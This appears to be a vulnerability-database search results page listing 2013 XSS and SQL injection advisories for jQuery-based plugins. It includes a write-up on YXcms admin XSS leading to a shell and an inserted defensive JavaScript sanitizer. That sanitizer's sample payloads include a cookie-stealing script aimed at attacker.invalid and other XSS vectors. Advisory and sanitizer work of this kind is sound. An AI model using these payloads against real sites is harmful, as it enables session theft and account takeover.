2423 matches found
CVE-2013-4383
CVE-2013-4383 describes a cross-site scripting (XSS) vulnerability in the jQuery Countdown module for Drupal (7.x-1.x). The root cause is insufficient sanitization of settings, allowing a user with the "access administration pages" permission to inject arbitrary script or HTML into a page via unspe...
Patched Microsoft Office 365 XSS Vulnerability Disclosed
A researcher in the UK disclosed the details of a serious cross-site scripting vulnerability in Office 365 that would allow an attacker with a mailbox on Office 365 to gain administrator rights over the Microsoft Web-based application in an organization. An exploit in an enterprise environment...
Cross site scripting
Cross-site scripting (XSS) vulnerability in Drupal 6.x before 6.28 and 7.x before 7.19, when running with older versions of jQuery that are vulnerable to CVE-2011-4969, allows remote attackers to inject arbitrary web script or HTML via vectors involving unspecified JavaScript functions that are use...
CVE-2013-0244
Cross-site scripting (XSS) vulnerability in Drupal 6.x before 6.28 and 7.x before 7.19, when running with older versions of jQuery that are vulnerable to CVE-2011-4969, allows remote attackers to inject arbitrary web script or HTML via vectors involving unspecified JavaScript functions that are use...
YXcmsApp: XSS in one place leads to getshell
Brief description: XSS into the admin backend leading to getshell, a one-stop service, though somewhat impractical. Detailed description: YXCMS is a content management system aimed at enterprises; it uses three-level caching and an MVC architecture and is open source under the BSD license. After registering a user, go to the user management page and click Publish Info - Add News; you find a rich-text editor, kindeditor. Whatever the editor, once a user has been given this much latitude, XSS is very likely to appear. Type in anything, capture the request, modify the content field, and write your XSS code; anything will do. Done. The administrator can see the article I submitted in the backend: then editing it triggers the XSS:...
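The report above is the standard stored-XSS path into an administrator's browser: the client-side editor (kindeditor) is irrelevant once the request is intercepted and the content field rewritten, so the only defence that counts is server-side sanitization before the article is stored or rendered in the backend. The following is an added example, not YXCMS's code and not the reporter's: an allowlist sanitizer for such a content field, written in JavaScript so it runs under Node. The tag and attribute allowlist, the helper names (sanitizeContent, safeHref) and the sample payloads are all assumptions constructed for this illustration; in production a maintained sanitizer library should replace the hand-rolled tokenizer, but the principle it shows is the one that matters: rebuild every tag from an allowlist, drop every attribute you did not explicitly permit, and escape everything else as text.

```javascript
// Added example (not YXCMS code): server-side allowlist sanitizer for a
// rich-text "content" field. The editor runs in the submitter's browser, so
// whatever it refuses to type can simply be placed into the intercepted
// request; the server must sanitize before the article reaches an admin.
// The allowlists below are assumptions chosen for this illustration.

const ALLOWED_TAGS = new Set(["p", "b", "i", "em", "strong", "ul", "ol", "li", "br", "a"]);
const ALLOWED_ATTRS = { a: new Set(["href"]) }; // no style, no on* handlers anywhere

function escapeHtml(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Only plain http(s) URLs survive; javascript:, data:, vbscript: and
// whitespace/tab scheme-obfuscation tricks all fail this test.
function safeHref(value) {
  return /^https?:\/\/[^\s"'<>]+$/i.test(value.trim());
}

function sanitizeContent(html) {
  const tagRe = /<\/?([a-zA-Z][a-zA-Z0-9]*)\b([^<>]*)>/g;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += escapeHtml(html.slice(last, m.index)); // text between tags
    last = tagRe.lastIndex;
    const closing = m[0][1] === "/";
    const name = m[1].toLowerCase();
    if (!ALLOWED_TAGS.has(name)) {
      // <script>, <img onerror=...>, <svg>, ... are rendered as literal text.
      out += escapeHtml(m[0]);
      continue;
    }
    if (closing) {
      out += `</${name}>`;
      continue;
    }
    let attrs = "";
    const allowed = ALLOWED_ATTRS[name];
    if (allowed) {
      // Only double-quoted attributes are recognised; anything else is dropped.
      const attrRe = /([a-zA-Z-]+)\s*=\s*"([^"]*)"/g;
      let a;
      while ((a = attrRe.exec(m[2])) !== null) {
        const attrName = a[1].toLowerCase();
        if (!allowed.has(attrName)) continue;
        if (attrName === "href" && !safeHref(a[2])) continue;
        attrs += ` ${attrName}="${escapeHtml(a[2])}"`;
      }
    }
    out += `<${name}${attrs}>`; // tag rebuilt from scratch, never copied through
  }
  out += escapeHtml(html.slice(last));
  return out;
}

// Constructed payloads of the kind a tampered "content" field would carry.
const SAMPLE_PAYLOADS = [
  '<p>Hello</p><script>document.location="http://attacker.invalid/?c="+document.cookie</script>',
  '<img src=x onerror=alert(1)>',
  '<a href="javascript:alert(1)" onclick="alert(2)">click</a>',
  '<p onmouseover="alert(3)">hover</p>',
  '<a href="https://example.com/?a=1&b=2">ok link</a>',
];

function sanitizeAll(payloads) {
  return payloads.map(sanitizeContent);
}

for (const [i, s] of sanitizeAll(SAMPLE_PAYLOADS).entries()) {
  console.log(`${i}: ${s}`);
}
```

Unknown tags are escaped rather than silently deleted so that the admin sees exactly what the submitter tried to inject, which is also useful forensically; unbalanced allowed tags are passed through as-is, which can break layout but cannot execute script. Text already containing entities is double-escaped (safe, but lossy), a trade-off a real implementation would handle with a proper HTML tokenizer.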
CVE-2013-6837
Cross-site scripting (XSS) vulnerability in the setTimeout function in js/jquery.prettyPhoto.js in prettyPhoto 3.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted PATH_INFO to the default URI...
CVE-2013-7129
Cross-site scripting (XSS) vulnerability in ThemeBeans Blooog theme 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the jQuery parameter to assets/js/jplayer.swf...
Cross site scripting
Cross-site scripting (XSS) vulnerability in ThemeBeans Blooog theme 1.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the jQuery parameter to assets/js/jplayer.swf...
JVN#28467717: Page Scroller vulnerable to cross-site scripting
Page Scroller from coliss is a script that uses jQuery. In addition to Page Scroller being available just as a script, it is also available as a ZIP archive that includes jQuery and demo files. The jQuery included in the ZIP archive contains a known cross-site scripting vulnerability CVE-2011-496...
Pagelime CMS XSS / Credential Disclosure
PAGELIME CMS jQuery Cross Site Scripting / Unencrypted VIEWSTATE parameter / User credentials are sent in clear text / Login page password-guessing...
SA-CONTRIB-2013-076 - jQuery Countdown - Cross Site Scripting (XSS)
This jQuery Countdown Module enables you to display a countdown block based upon date settings. The jQuery Countdown Module does not properly sanitize the settings, allowing a malicious user to embed scripts within a page, resulting in a cross-site scripting (XSS) vulnerability. This vulnerability ...
CVE-2013-2022
Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.23 allow remote attackers to inject arbitrary web script or HTML via the (1) jQuery or (2) id parameters, a different vulnerability than CVE-2013-1942 and...
UBUNTU-CVE-2013-2022
Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.23 allow remote attackers to inject arbitrary web script or HTML via the (1) jQuery or (2) id parameters, a different vulnerability than CVE-2013-1942 and...
CVE-2013-2022
CVE-2013-2022 refers to multiple XSS vulnerabilities in the Flash SWF component jplayer.swf (jPlayer) within actionscript/Jplayer.as. Affected are jPlayer versions before 2.2.23, where remote attackers could inject arbitrary script or HTML via the (1) jQuery or (2) id parameters in the jplayer.sw...
Cross site scripting
Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.20, as used in ownCloud Server before 5.0.4 and other products, allow remote attackers to inject arbitrary web script or HTML via the (1) jQuery or (2) id...
CVE-2013-1942
Multiple cross-site scripting (XSS) vulnerabilities in actionscript/Jplayer.as in the Flash SWF component jplayer.swf in jPlayer before 2.2.20, as used in ownCloud Server before 5.0.4 and other products, allow remote attackers to inject arbitrary web script or HTML via the (1) jQuery or (2) id...
CVE-2013-1942
Removed by vendor...
Sql injection
SQL injection vulnerability in the jQuery autocomplete for indexedsearch rzautocomplete extension before 0.0.9 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...
CVE-2013-4634
SQL injection vulnerability in the jQuery autocomplete for indexedsearch rzautocomplete extension before 0.0.9 for TYPO3 allows remote attackers to execute arbitrary SQL commands via unspecified vectors...